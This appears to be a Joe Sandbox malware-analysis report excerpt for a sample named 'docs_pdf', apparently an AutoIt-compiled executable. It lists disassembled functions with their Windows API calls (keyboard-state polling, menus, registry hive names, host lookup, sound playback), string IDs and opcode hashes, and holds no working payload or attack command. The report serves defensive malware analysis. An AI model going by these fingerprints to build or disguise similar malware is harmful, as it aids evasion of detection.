                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 537147316-1018226102
                                    • Opcode ID: 0bf37cf02a0582c88415791ebf4b707fd0ef812e7aa04ea8163adccc850ff195
                                    • Instruction ID: be3c2f51ebf308da855278f63968c54310d4e53f4b60d1cae1c8706bf814a5f8
                                    • Opcode Fuzzy Hash: 0bf37cf02a0582c88415791ebf4b707fd0ef812e7aa04ea8163adccc850ff195
                                    • Instruction Fuzzy Hash: E20278315083819FC724EF26C881AAFBBE5BF98714F14491DF486972A1DB38D949EF42
                                    Function 00FB45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00FB45F9
                                    • GetMenuItemCount.USER32(01076890), ref: 00FED7CD
                                    • GetMenuItemCount.USER32(01076890), ref: 00FED87D
                                    • GetCursorPos.USER32(?), ref: 00FED8C1
                                    • SetForegroundWindow.USER32(00000000), ref: 00FED8CA
                                    • TrackPopupMenuEx.USER32(01076890,00000000,?,00000000,00000000,00000000), ref: 00FED8DD
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FED8E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 2751501086-0
                                    • Opcode ID: eed724de8e3ea21646ccbda05b2141b5b9535c23694027a144c5daf3d176a0f3
                                    • Instruction ID: 45b61fd9ea14afbca4c2bfc7921c1550393e36722db01d22e866554058c8ff44
                                    • Opcode Fuzzy Hash: eed724de8e3ea21646ccbda05b2141b5b9535c23694027a144c5daf3d176a0f3
                                    • Instruction Fuzzy Hash: 4371E471A01246BAEB309F26DC45FEABF69FF05364F200216F514A61E1C7B56810EB91
                                    Function 010310A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,01030038,?,?), ref: 010310BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: 72dd9600183063fc774cf0ef94ef8e81c6cd6c188f0ad7e956d6098b3dd6f9fe
                                    • Instruction ID: 750075c3802c8c7445a07c9f1c4e6b6b6511185cab70c49f81d3b88d4f0ffa2a
                                    • Opcode Fuzzy Hash: 72dd9600183063fc774cf0ef94ef8e81c6cd6c188f0ad7e956d6098b3dd6f9fe
                                    • Instruction Fuzzy Hash: 1141617020024ADBDF11EFA4DC81AEE376ABF89340F444456FCD19B252DF34A91ADB60
                                    Function 01015569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                      • Part of subcall function 00FB7A84: _memmove.LIBCMT ref: 00FB7B0D
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 010155D2
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 010155E8
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 010155F9
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0101560B
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0101561C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: SendString$_memmove
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2279737902-1007645807
                                    • Opcode ID: c8e55beba32aa4d6d788d44ea3e5832f3f2435aa5f7cb03477a9c8f2d414eb5e
                                    • Instruction ID: f55657288c3010a2227897b7b43237b9d4f7374785f959e35876a3b3da22ac6e
                                    • Opcode Fuzzy Hash: c8e55beba32aa4d6d788d44ea3e5832f3f2435aa5f7cb03477a9c8f2d414eb5e
                                    • Instruction Fuzzy Hash: 78118220A50269B9D720B667DC8ADFFBF7CEFD6B00F004459B481AB095DEA85905C9A1
                                    Function 010148F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 208665112-3771769585
                                    • Opcode ID: 8eb991664e7e6be4b06c449cfb6f2d8cdb32eeefc9615b2e01ed687d27193389
                                    • Instruction ID: dce81e466a7b024cfb912c718c6113b9e560937d3f207b7dce115fc9e7f59d05
                                    • Opcode Fuzzy Hash: 8eb991664e7e6be4b06c449cfb6f2d8cdb32eeefc9615b2e01ed687d27193389
                                    • Instruction Fuzzy Hash: B3112731904115ABCB25EB24EC0AEDE77FEEF40710F0801A6F488D6169EF7D9A8197A1
                                    Function 01015217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • timeGetTime.WINMM ref: 0101521C
                                      • Part of subcall function 00FD0719: timeGetTime.WINMM(?,75C0B400,00FC0FF9), ref: 00FD071D
                                    • Sleep.KERNEL32(0000000A), ref: 01015248
                                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0101526C
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0101528E
                                    • SetActiveWindow.USER32 ref: 010152AD
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 010152BB
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 010152DA
                                    • Sleep.KERNEL32(000000FA), ref: 010152E5
                                    • IsWindow.USER32 ref: 010152F1
                                    • EndDialog.USER32(00000000), ref: 01015302
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: b83c2e7ee32543476774d7ed3352428426a918b9f6d5d2d57d05acc58793eaf4
                                    • Instruction ID: c4cb926361c3c059f4f25ba3ffc20c5d929f9ac12323fae62e3084ae5b39d8ae
                                    • Opcode Fuzzy Hash: b83c2e7ee32543476774d7ed3352428426a918b9f6d5d2d57d05acc58793eaf4
                                    • Instruction Fuzzy Hash: 7A21F97190030AAFE7215F30ED8CB653B6DF78A386F401058F1C19A19CEBAF5C009722
                                    Function 0101D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • CoInitialize.OLE32(00000000), ref: 0101D855
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0101D8E8
                                    • SHGetDesktopFolder.SHELL32(?), ref: 0101D8FC
                                    • CoCreateInstance.OLE32(01042D7C,00000000,00000001,0106A89C,?), ref: 0101D948
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0101D9B7
                                    • CoTaskMemFree.OLE32(?,?), ref: 0101DA0F
                                    • _memset.LIBCMT ref: 0101DA4C
                                    • SHBrowseForFolderW.SHELL32(?), ref: 0101DA88
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0101DAAB
                                    • CoTaskMemFree.OLE32(00000000), ref: 0101DAB2
                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0101DAE9
                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0101DAEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 1246142700-0
                                    • Opcode ID: ec7584a3e0b8b4f7bd8dc60a5dc35c977e32ac854dcea35a75c334d0de3c5f95
                                    • Instruction ID: e63264f9f58aacee2956d4f8da53fcabed36f1257f22fcd4460fa99af57379e5
                                    • Opcode Fuzzy Hash: ec7584a3e0b8b4f7bd8dc60a5dc35c977e32ac854dcea35a75c334d0de3c5f95
                                    • Instruction Fuzzy Hash: B8B1FB75A00109AFDB14DFA5C888DAEBBF9FF48304B048499F949EB251DB35ED41CB50
                                    Function 0101052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 010105A7
                                    • SetKeyboardState.USER32(?), ref: 01010612
                                    • GetAsyncKeyState.USER32(000000A0), ref: 01010632
                                    • GetKeyState.USER32(000000A0), ref: 01010649
                                    • GetAsyncKeyState.USER32(000000A1), ref: 01010678
                                    • GetKeyState.USER32(000000A1), ref: 01010689
                                    • GetAsyncKeyState.USER32(00000011), ref: 010106B5
                                    • GetKeyState.USER32(00000011), ref: 010106C3
                                    • GetAsyncKeyState.USER32(00000012), ref: 010106EC
                                    • GetKeyState.USER32(00000012), ref: 010106FA
                                    • GetAsyncKeyState.USER32(0000005B), ref: 01010723
                                    • GetKeyState.USER32(0000005B), ref: 01010731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: e9574f415c041cecfbf426f3827c39034407340d07104e5d1ea1c1e8cedcdf03
                                    • Instruction ID: a049a29c62a554ef0c8768be95b87b75e104e52fac6cf34318382b8098bee588
                                    • Opcode Fuzzy Hash: e9574f415c041cecfbf426f3827c39034407340d07104e5d1ea1c1e8cedcdf03
                                    • Instruction Fuzzy Hash: 0351EC30A0478919FB75DBB488547EABFF49F41280F0885DADAC2561CEDA6C97CCCB52
                                    Function 0100C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 0100C746
                                    • GetWindowRect.USER32(00000000,?), ref: 0100C758
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0100C7B6
                                    • GetDlgItem.USER32(?,00000002), ref: 0100C7C1
                                    • GetWindowRect.USER32(00000000,?), ref: 0100C7D3
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0100C827
                                    • GetDlgItem.USER32(?,000003E9), ref: 0100C835
                                    • GetWindowRect.USER32(00000000,?), ref: 0100C846
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0100C889
                                    • GetDlgItem.USER32(?,000003EA), ref: 0100C897
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0100C8B4
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0100C8C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: c5c975945c30309b611b6b658a36bf384995802a29e971cc721a208b8de3380a
                                    • Instruction ID: 04210b829aa96817fa2bb6410085b6eaff9bb7378a9c76dd8a0bfefbff635922
                                    • Opcode Fuzzy Hash: c5c975945c30309b611b6b658a36bf384995802a29e971cc721a208b8de3380a
                                    • Instruction Fuzzy Hash: FB514171B00205ABEB19CF7CDD89AAEBBBAFB88310F14826DF655D62D4D77599008B10
                                    Function 00FB201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB2036,?,00000000,?,?,?,?,00FB16CB,00000000,?), ref: 00FB1B9A
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FB20D3
                                    • KillTimer.USER32(-00000001,?,?,?,?,00FB16CB,00000000,?,?,00FB1AE2,?,?), ref: 00FB216E
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00FEBEF6
                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FB16CB,00000000,?,?,00FB1AE2,?,?), ref: 00FEBF27
                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FB16CB,00000000,?,?,00FB1AE2,?,?), ref: 00FEBF3E
                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FB16CB,00000000,?,?,00FB1AE2,?,?), ref: 00FEBF5A
                                    • DeleteObject.GDI32(00000000), ref: 00FEBF6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 641708696-0
                                    • Opcode ID: e0532ad3af1fcd6f6169c2ec613750743fda831323310f2c57cbc4f976e51110
                                    • Instruction ID: aaa39bc98801e11aec5c5f587acb1b29241ef230456a20e43d4dd9acac4c4f6b
                                    • Opcode Fuzzy Hash: e0532ad3af1fcd6f6169c2ec613750743fda831323310f2c57cbc4f976e51110
                                    • Instruction Fuzzy Hash: D261C135900A41DFDB75AF5AC948B6AB7F1FF40322F10851DE08396968C73AA881FF81
                                    Function 00FB21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FB25EC
                                    • GetSysColor.USER32(0000000F), ref: 00FB21D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: 6544ed86d37fdac0db1aec329ad0f5a8012ed2a435ddc1970d48bf9d4da653de
                                    • Instruction ID: aa981407751460dde7eac93ef00cff052bc1a39f9c0f08f05613c8a7f303d907
                                    • Opcode Fuzzy Hash: 6544ed86d37fdac0db1aec329ad0f5a8012ed2a435ddc1970d48bf9d4da653de
                                    • Instruction Fuzzy Hash: EC41C231900144AFEB655F29E888BF93B65EB06331F184355FEA5CA1E6C7368C42EF61
                                    Function 0101AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,0103F910), ref: 0101AB76
                                    • GetDriveTypeW.KERNEL32(00000061,0106A620,00000061), ref: 0101AC40
                                    • _wcscpy.LIBCMT ref: 0101AC6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: 3896daabe2e233858e3b4ce2d5d57972ef70fd1bca66fed3e47819bc6ed61c24
                                    • Instruction ID: 226e2f6784ed64199e13f7c3d41a49ee88e70e03677c1f9d98f34787bdf16d6d
                                    • Opcode Fuzzy Hash: 3896daabe2e233858e3b4ce2d5d57972ef70fd1bca66fed3e47819bc6ed61c24
                                    • Instruction Fuzzy Hash: 36519F30208382DBC710FF19CC91AAEB7EAFF84700F44481EF5D6572A6DB399909DA52
                                    Function 00FB9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __i64tow__itow__swprintf
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 421087845-2263619337
                                    • Opcode ID: 8d46ae2da2e3417618ed6e180b1d940199568f43db3866f5b050f49783554b55
                                    • Instruction ID: f1d2a1f2fbfa51cf183cb72f27fb771ffb277a83b57aef1f8419b5b49e61ee1a
                                    • Opcode Fuzzy Hash: 8d46ae2da2e3417618ed6e180b1d940199568f43db3866f5b050f49783554b55
                                    • Instruction Fuzzy Hash: B0412772A04205AFDB24AF36DC42FBA73F9EB44310F24446FE689D7242EE759905AB11
                                    Function 010373C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 010373D9
                                    • CreateMenu.USER32 ref: 010373F4
                                    • SetMenu.USER32(?,00000000), ref: 01037403
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01037490
                                    • IsMenu.USER32(?), ref: 010374A6
                                    • CreatePopupMenu.USER32 ref: 010374B0
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010374DD
                                    • DrawMenuBar.USER32 ref: 010374E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                    • String ID: 0$F
                                    • API String ID: 176399719-3044882817
                                    • Opcode ID: 022cb5b7b54e4a50192d6f8f018396474f2c01b281226d0eeb6d527feffe5a10
                                    • Instruction ID: e2e6ee38d9115f0d3e30339a98406b1724dcaea9d88206b6feda7ed41266cbcd
                                    • Opcode Fuzzy Hash: 022cb5b7b54e4a50192d6f8f018396474f2c01b281226d0eeb6d527feffe5a10
                                    • Instruction Fuzzy Hash: 76414BB5A00209EFEB20DF68D844E9ABBF9FF49310F144069FA95A7350DB36A914CF51
                                    Function 0103772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 010377CD
                                    • CreateCompatibleDC.GDI32(00000000), ref: 010377D4
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 010377E7
                                    • SelectObject.GDI32(00000000,00000000), ref: 010377EF
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 010377FA
                                    • DeleteDC.GDI32(00000000), ref: 01037803
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0103780D
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01037821
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0103782D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
